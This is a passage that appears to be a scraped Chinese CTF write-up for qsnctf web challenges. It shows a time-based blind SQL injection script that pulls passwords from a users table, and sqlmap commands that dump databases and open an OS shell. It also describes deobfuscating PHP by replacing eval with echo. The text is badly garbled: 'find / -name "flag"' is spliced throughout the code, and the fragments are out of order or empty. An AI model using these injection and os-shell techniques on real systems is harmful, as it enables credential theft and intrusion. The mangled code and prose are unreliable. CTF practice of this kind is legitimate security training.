文章管理系统
起首打开情况(>ω{j},sleep(0.5),0)#"find / -name "flag"find / -name "flag"payload = f"if(ascii(substr((select group_concat(password) from users),{i},1))>{j},sleep(0.5),0)#"find / -name "flag"find / -name "flag"data = {find / -name "flag"find / -name "flag"find / -name "flag"'uname': "admin' and "+payload,find / -name "flag"find / -name "flag"find / -name "flag"'psw':123456find / -name "flag"find / -name "flag"}find / -name "flag"find / -name "flag"try:find / -name "flag"find / -name "flag"find / -name "flag"r = requests.post(url=url, data=data,timeout=0.2)find / -name "flag"find / -name "flag"except Exception as e:find / -name "flag"find / -name "flag"find / -name "flag"continuefind / -name "flag"find / -name "flag" res += chr(j)find / -name "flag"find / -name "flag"print(res)find / -name "flag"find / -name "flag"break[/code] 得到flag:
- sqlmap -u http://challenge.qsnctf.com:31645/?id=1 --dbs
复制代码 雏形系统
打开情况后映入眼帘的是登陆系统,那就像之前一样思量sql 以及弱口令:
结果折腾半天啥也没有,这是一个可修改的界面,那没办法了试一试dirsearch扫描:
kali启动!- sqlmap -u http://challenge.qsnctf.com:31645/?id=1 -D ctftraining -T test --dump
复制代码
扫面到了www.zip
那可以直接打开了:
解压以后出现两个文件,看过以后robots.txt里边没东西直接打开“qsnctf.php”就可以了
qsnctf.php- sqlmap -u "http://challenge.qsnctf.com:32030/?id=1" --os-shell
复制代码 审计完以后,去掉无用的图层一系列代码,剩下用的就是打眼一看混淆,考的还挺新的,给大家送一个博客,我只讲这题。。。0.0“奇安信攻防社区-phpjm混淆解密浅谈”
先把qsnctf.php的eval改成echo- [/code]得出这个乱七八糟的东西:
- [code]qsnctf{5a73aa45b44b409a815a4051428a3e11}
复制代码 更换:
[code][/code]这样就得到了源码,长这样:
[code] |